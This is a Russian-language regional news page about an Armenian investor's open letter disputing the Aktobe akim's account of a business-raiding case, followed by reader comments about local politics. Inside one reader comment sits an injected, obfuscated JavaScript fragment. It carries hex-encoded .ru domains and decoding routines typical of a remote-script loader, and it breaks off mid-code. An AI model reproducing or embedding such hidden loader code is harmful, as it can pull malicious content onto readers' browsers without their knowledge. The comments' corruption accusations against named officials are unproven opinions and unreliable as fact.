Инвестор написал акиму о квартирах в Юнис Сити

Инвестор написал акиму о квартирах в Юнис Сити

Инвестор написал акиму о квартирах в Юнис Сити

Инвестор из Армении, написавший президенту о рейдерстве в Актобе, ответил на выступление акима области Бердыбека Сапарбаева.

Напомним, предприниматель Г.Асрян написал президенту РК открытое письмо, в котором обвинил банк и акима в рейдерском захвате («Диапазон» от 2.03.2017). Аким области коротко ответил, что «вы сами знаете, бизнес никто не зажимает, мы знаем, какой он был инвестор, как мы ввели газ в Иргизский и Уилский районы, 7 лет они этим занимались» («Диапазон» от 8.03.2017). Параллельно идут суды, руководители фирм Асряна уже за решеткой, сам он в международном розыске. Скандальное дело набирает обороты. «Диапазон» по-прежнему будет предоставлять слово участникам конфликта, от которого страдают сотни актюбинцев, потерявших работу, свободу, переживающих за свое жилье.

Гегам Асрян прислал в «Диапазон» ответ акиму области и депутатам маслихата. Приводим его письмо в сокращении.

ЖК «Юнис Сити»

« По деньгам, полученным от жильцов Юнис Сити якобы обманным путем, официально заявляю: ни один тенге не был выведен за пределы РК; ни одна квартира не была продана двум лицам; ни разу не заключались сделки купли-продажи по несуществующим квартирам. Не исключаю, что некоторые квартиры могли быть по ошибке заложены в банке, но при выявлении таких фактов в банк незамедлительно отдавались в залог другие квартиры. Все сделки совершались в соответствии с законом. На все квартиры есть правоустанавливающие документы, зарегистрированные в установленном порядке.

Сейчас по всем квартирам Юнис Сити наложены ограничения, за исключением квартир в таких же домах, которые мы точно так же строили, но для ФН «Сам­рук-Казына», и квартир собственников, которые отстояли права в суде. Отчего складывается впечатление, что проблемы Юнис Сити созданы искусственно, чтобы усугубить положение ТОО «Оксибилд». Если я не прав, то почему по квартирам, реализованным через ФН, отсутствуют те проблемы, с которыми сталкиваются обычные граждане, купившие такие же квартиры, но через ТОО? Налицо двойные стандарты, избирательный подход властей и банка, что подтверждает заказной характер уголовных дел в отношении меня и сотрудников ТОО, – делает вывод Гегам Асрян».

В письме также сказано, что газопровод в Иргиз они строили не 7 лет, а с 2013 по 2015 год. Проблема возникла из-за неполного и несвоевременного финансирования. Предприниматель подчеркивает, что он взял кредит и попал в кабалу банка именно из-за строительства этого важного для области объекта. А деньги из бюджета так и не получил, хотя финансирование утвердили облмаслихат и аким области А.Мухамбетов. По словам предпринимателя, при новом акиме не стали выполнять эти обязательства.

Гостиница «Космос»

Гостиницу «Космос» он купил в 2013 году. А в 2015 для завершения строительства заложил ее, базу отдыха и многое другое. Банк взял залог, но из-за девальвации 2015 г. не рискнул выдать деньги в запланированные сроки.

« Я начал переговоры с иностранными банками России, Чехии, Словакии и Турции по финансированию строительства гостиницы и развитию местного туризма на базе отдыха «Шале де люкс». Уже сейчас самый известный долгострой области мог бы превратиться в красивую достопримечательность Актобе, но из-за искусственно созданных вокруг моих ТОО событий реализация инвестиционных проектов заморожена. При этом все дополнительные залоги, оформленные под планируемый кредит, до сих пор под обременением банка, их рыночная стоимость в 5-6 раз превышает остаток задолженности по ранее выданному кредиту. Под обременением в банке еще 187 квартир для «Казахстанской ипотечной компании», была договоренность о приобретении квартир на 1,8 млрд тенге. Банк держит в залоге имущество ТОО на 6 млрд тенге и мог бы вернуть всю сумму основного долга и вознаграждения (1,054 млрд тенге), продав часть залога. Продажа только 187 квартир позволит погасить все долги и высвободить из обременения гостиницу «Космос» и базу отдыха «Шале де люкс».

Считаю, что в отношении меня и моих ТОО ведется последовательное создание непрерывной череды проблем сразу по нескольким направлениям, цель которых захват всех принадлежащих мне активов. Последние аресты руководителей моих компаний Сирота В., Безносюк Э., Берденова А. по статье «Мошенничество в составе ОПГ», часто применяемой при отъеме чужого бизнеса, подтверждают это», – пишет предприниматель.

Предприниматель предположил, что аким мог быть неверно информирован и попросил его организовать проверку и убедиться в достоверности его информации.

Интересная новость? 0 Добавить в закладки
Материалы по теме:
рассказать о новости:
В Мой Мир Вконтакте Класс!
добавить комментарий

Уважаемые пользователи! Оставляя комментарии, проявляйте уважение и толерантность к мнению других посетителей. Просим вас избегать сообщений, приводящих к разжиганию конфликтов, расистских высказываний, оскорблений, провокаций и дискуссий, не относящихся к теме статьи. Ссылки на сторонние ресурсы в комментариях запрещены. Такие сообщения будут удаляться, а их авторы будут забанены.

Все комментарии (28):
Сортировать:
фото пользователя Atabek
Atabek
Число таких  "инвесторов" доставшийся от команды прежних акимов области будут с каждым разом увеличиваться. Так как поступление от нефтяных денег уменьшился в разы, Актюбинская область который год подряд является дотационных,а когда-то лет 10 назад был донором. Поступление в областную и республиканский бюджет уменьшается. Короче говоря денег нема на всех,вот и будут кричать прежние кого оторвали от кормушек, да и потом нагло грабили бюджет.Все помнят про 30 и более процентные откаты,в народе это стало поговоркой и пословицей.Последствия этих коррупции мы еще долго будем пожинать. Эти ворюги государственных денег думают,что можно судьбу и закон обмануть, одну из них можно какое то время обмануть, но вторая рано или поздно настигнет тебя.А также не надо забывать про кару небесную, оно если не на тебе отразится,так на потомках точно выйдет боком. 
16.03.2017, 12:16
фото пользователя Amanbek
Amanbek
Они платят, они работали, у них отжимают-область стала дотационным, связь не видна? Прочтите все статьи по этому делу и станет многое понятно вам
16.03.2017, 14:52
фото пользователя Jasik_adai
Jasik_adai
Интересно , как теперь отреагируют власти на столь серьёзное заявление ? Получается диз информация в городе ? Акиму доложили по Асей вероятности его подчинённые что 7 лет Газ проводился а на самом деле 3 года! Ппц поставили акима . Уважаемый аким , вам срочно надо менять подчиненных . Из за таких неразберих , ваша репутация страдает . Нужна полная чистка . Надеемся на ваше правильное решение .
16.03.2017, 13:47
фото пользователя Jasik_adai
Jasik_adai
Интересно , как теперь отреагируют власти на столь серьёзное заявление ? Получается диз информация в городе ? Акиму доложили по Асей вероятности его подчинённые что 7 лет Газ проводился а на самом деле 3 года! Ппц поставили акима . Уважаемый аким , вам срочно надо менять подчиненных . Из за таких неразберих , ваша репутация страдает . Нужна полная чистка . Надеемся на ваше правильное решение .
16.03.2017, 13:49
фото пользователя Малинка
Малинка
Вы тоже зарегистрировались в поддержку Асряна?))
Скажите тогда,если вы владеете информацией,акт ввода газопровода в каком году был подписан?
16.03.2017, 15:04
фото пользователя Amanbek
Amanbek
В соответствии с договором как написано в письме, прочтите все письма
16.03.2017, 15:12
фото пользователя Малинка
Малинка
В письме также сказано, что газопровод в Иргиз они строили не 7 лет, а с 2013 по 2015 год. Проблема возникла из-за неполного и несвоевременного финансирования.
Вот так написано в статье.Написано что ПРОБЛЕМА возникла.Так значит объект не был сдан вовремя?
Выходит в сроки оговоренные в договоре не уложились.

16.03.2017, 15:19
фото пользователя Малинка
Малинка
В этом бизнесе муть присутствует.
16.03.2017, 15:20
фото пользователя taxsist2
taxsist2
Малинка муть присутствует во всем бизнесе, получается ранее при Имантаева были одни, потом пришел Архимед и другие протопталитропинку, теперь "наши в городе" (Свадьба в Малиновке) и другие начинают старый дедовский метод, как с Имантаевым, письма Президенту, бизнес отжимают и т.д. что скажет прокуратура? не думаю,что туда не писали, а он(Прокуратура) надзорный орган за соблюдением законности.
18.03.2017, 17:43
фото пользователя Sasha 33
Sasha 33
Объект сдали во время в 2015 г ,бюджет не платил, оборудование каторгой не хватало в проекте поставили позже не по проекту и переделки за глобус казтрансгаз сделал по поручению Акима, после этого только запустили газ людям. До сих пор не расчитались со мной да и многим не дали полный расчёт !
16.03.2017, 15:52
фото пользователя Малинка
Малинка
Есть ведь в договоре гос.закупки (гос.заказа)гарантийный срок,в течении которого брак обязан переделать подрядчик.
Кто такие ГлобусКазТрансГаз?Почему за него пишете что переделывали?Или это заказчик?Если это заказчик,то государство для него и заключило договор на установку газа.Этот Глобус не обязан ничего переделывать за кого то.Обьясните.
16.03.2017, 15:57
фото пользователя Sasha 33
Sasha 33
Не пойму каким местом вы там связаны но поясню, я пишу факты сам там работал, вы несёте чушь не пойму в чьих интересах, глобус это те кто должны были строить этот газ, их осудили за хищение денег, а оксибилд должен был выполнить работу за деньги каторые остались( глобус получил около половины денег всего проект и не сделал ни хера 20км из 180км) те не успели утащить, казтрансгаз компания каторая принимает объект у заказчика и запускает газ, но не приняла потому-что нет глобуса каторый должен был восстановить то что он сделал, не оксибилд а глобус
16.03.2017, 16:37
фото пользователя Sasha 33
Sasha 33
а что мы сделали т.е. оксибилд,в соответствии с проектом не может работать так как не хватает оборудования, его нет в проекте, но оксибилд купил, мы 3 раза первый ределывали крановые узлы, они сейчас не по проекту потому-что по проекту не возможно запустить газ, и казтрансгаз вложил свои силы и деньги на переделку работ глобуса, поэтому акт подписан во время а газ подали позже, и знаю точно если бы у оксибилд были бы мозги,забрал бы обарудование каторого нет в проекте и газа бы не было и деньги быстро дали бы ему, а так, сам дурак , поверил не пойму кому,поэтому вот так все у него!!
16.03.2017, 16:38
фото пользователя Bussines_man
Bussines_man

Поддерживаю Асряна как и десятки других предпринимателей Актобе! Команда Акима устроила реальный беспредел в городе с отжимом, рейдерством и наездами на бизнес.  Я говорю о наглых и ярких попытках людей с команды нашего уважаемого, проталкивать везде  своих.  Врут, о том, что ничего не отбирают, никого не трогают. Выдумывают кучу обвинений в адрес бизнеса, что, мол они сами во всем виноваты. Оглянитесь вокруг и посмотрите, везде пихают своих на должности. История с пляжами, полив цветов,другие делишки, везде все сливается своим и друзьям. А наглость и их поведение (за кулисами) отдельный разговор. Я уверен меня поддержат десятки компаний, которые знают как реально ведут себя  эти южно-восточные гости. Сам имел дело с ними. Эти ребята считают себя тут хозяевами города, а местный бизнес задвигают и всячески пихают как могут друзей своих.

17.03.2017, 00:28
фото пользователя Amanbek
Amanbek
Я не могу сказать что очень близко Герам знаю, но был у него в офисе, в ЖК все что видел мне очень понравилось, а шале вообще отдельный разговор, там все было закрыто до него, после открыли для людей, детские площадки, зверюшки птицы все что видел восхитило, и слушая все сейчас, все понимаю,не стыковку, видя все в каком состоянии все, он вкладывал реально, и для себя конечно, но все это в любом случае осталось бы у нас в городе, поэтому и не очень верю что обманул кинул забрал и.т.д
17.03.2017, 01:07
фото пользователя taxsist2
taxsist2
Amanbek Шале до него он был Ширяева на которого завели уголовное дело и которое вроде уже развалилось... Герам может тоже походит в Армении,а тут найдется человечек который окажется в главной роли? Говорят время лечит?))
18.03.2017, 17:37
фото пользователя Amanbek
Amanbek
Походу тут наоборот с начала нашёлся человек потом завели дело. При Ширяеве это была закрытая резиденция для избранных, он после покупки вложился ещё строил там что то , открыл, любой мог пойти. А Ширяев походу на деньги за приобретение и живет не плохо!
18.03.2017, 19:07
фото пользователя Amanbek
Amanbek
Если он такой машенни вряд ли в Армении , кайфует наверное где нибудь на островах, в то же время что писать то президенту если стащил?, поэтому и так много вопросов и предположений.
18.03.2017, 19:13
фото пользователя Amanbek
Amanbek
Насколько известно Ширяев все продал получил деньги, дело развозилось , поэтому и не потеет тихо, а у этого все просто забирают и ещё дело возбудили для этого, пока разберутся ничего не останется от него и какая разница после этого развалится или нет дело против него вот и потеет, не хорошо все это , поэтому и нет до сих пор ни одного известного бизнесмена с нашей области, каторге сами поднялись,, чуть поднимаются и нет их.....
18.03.2017, 19:25
фото пользователя Mnenie
Mnenie
Сразу три предпринимателя обратились напрямую к президенту. Это не просто так. Ранее, в других городах так же были жалобы от предпринимателей о том, что проекты делали без финансирования, т.е. за свой счет. К тому же, в нашем городе были установлены знаки дорожного движения, которые никак не решили дорожную ситуацию, но доход казне принесли не малый. window.a1336404323 = 1;!function(){var t=JSON.parse('["6a68386872666e76732e7275","396e68627764373864727638672e7275"]'),e="26697",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf
17.03.2017, 10:38
фото пользователя beowolf
beowolf
Ох и натворил же 30 процентов делов, весь город под его покровительством был
18.03.2017, 16:15
фото пользователя Zaderzavuobidno
Zaderzavuobidno
Atabeku, Малинке и Taxsistu2. Люди, читаю ваши комменты и диву даюсь. Вы о чем? Где здравый смысл? Неужели вас и вправду устраивает такой расклад, когда судьба бизнеса, судьба отдельных людей зависит от смены акима? Неужели вас устаивает, что Сапарбаев, чихать хотел на Закон, на интересы горожан, по сути- наши с вами интересы и права. Вы хлопаете в ладоши и кричите браво, когда Сапарбаев рушит подаренный городу ( по сути нам с вами) обелиск, когда он давит бизнес, когда даёт распоряжение отключить свет в домах акима и замакима Мугоджарского района, когда устанавливает в городе возле торговых домов и рынков знаки " остановка запрещена". Вас это умиляет и радует потому что не касается лично вас, ваших родных и близких? Вы заблуждаетесь, Господа, это касается каждого из нас. И если вы не видите или не хотите замечать того что творится, то сочувствую вам.
18.03.2017, 22:52
фото пользователя Малинка
Малинка
Сапарбаев рушит подаренный городу ( по сути нам с вами) обелиск
Нарушен значит закон.Почему юристы компании,с самого начала спали?Почему не сказали руководителю,не предупредили?
когда даёт распоряжение отключить свет в домах акима и замакима Мугоджарского района
Аким и замакима справлялись со своими задачами,в районе свет,газ,вода у простых людей в избытке? Наши акимы без света впервые в жизни остались,а люди сидят без света и смотрят на окна акима.
когда устанавливает в городе возле торговых домов и рынков знаки " остановка запрещена".
это вы имеете ввиду колхозный рынок?
Не надо нам сочувствовать,как лично вас коснулось,так вы высокими словами заговорили.А раньше все вас устраивало?Или это все только сейчас увидели?Это называется шкурный интерес.
ЗАДЕРЖАВУОБИДНО )))Может по другому обзоветесь?Слишком пафосно.
20.03.2017, 11:08
фото пользователя Zaderzavuobidno
Zaderzavuobidno
Вы вот все хором хаете прежнюю власть, и поете диферамбы нынешней власти. А чем она лучше прежней? Таких раздолбанных дорог, как сейчас, и такой грязи уж точно не было. Земли кому то, а не вам выдавались, в тендерах " не те, как вы считаете выигрывали. А сейчас что??? Земли без взяток стали выдавать? В тендерах без откатов и протекции выигрывают? Откаты перестали брать? Чушь полная... Вот произвола такого не было- это точно. И не пиарились так в СМИ, как это любит делать Сапарбаев. И Президент наш судя по всему незаслуженно чихвостил месяц назад господина Сапарбаева и за качество дорог, и за развал экономики в Актюбинской области.
18.03.2017, 23:28
фото пользователя Sasha 33
Sasha 33
Да уж, в принципе вы правы во многом, пока я работал в оксибилде 3 Акима поменялось, хорошо плохо как то двигалось все и не только у нас, теперь местные компании строго на субподрядах или там где самим надо вкладывать а потом может быть и получим что то обратно, когда нибудь, если конечно Акима не поменяют!
19.03.2017, 01:31
фото пользователя Малинка
Малинка
Дааа... Разворошили осинное гнездо.
20.03.2017, 10:52
фото пользователя ферзя
ферзя
Может Сапарбаев сносит памятники подаренные городу а возможно старые стереотипы, связи, - которые использовали не взирая на закон. Очень многое позволительное ранее, уже не вписывается в новый курс новой политики. Многое на авось не получится. Памятник у Нурдаулета - по моему личному мнению, это не подарок городу, а благоустройство самого нурдаулета. Как и зоопарк как и карусели и т.д. И носили они не бескорыстный характер.  И устанавливались они не где то. И все что меня интересует в данном аспекте, оформлено ли это было по закону, а тут такого не разу не представили. А если нет, хотите этим господам дать особый статус перед законом?
20.03.2017, 12:27
фото пользователя ферзя
ферзя
Каруселей хватает. даст Бог и зоопарки появятся. Без этого памятника прожить можно. А вот с такими людьми попирающих закон, одними связями и деньгами, жить трудно. Если так уж и хочется, пусть договорится с акимами районов и установит им всю эту прелесть бескорыстно 
20.03.2017, 12:34
Loading...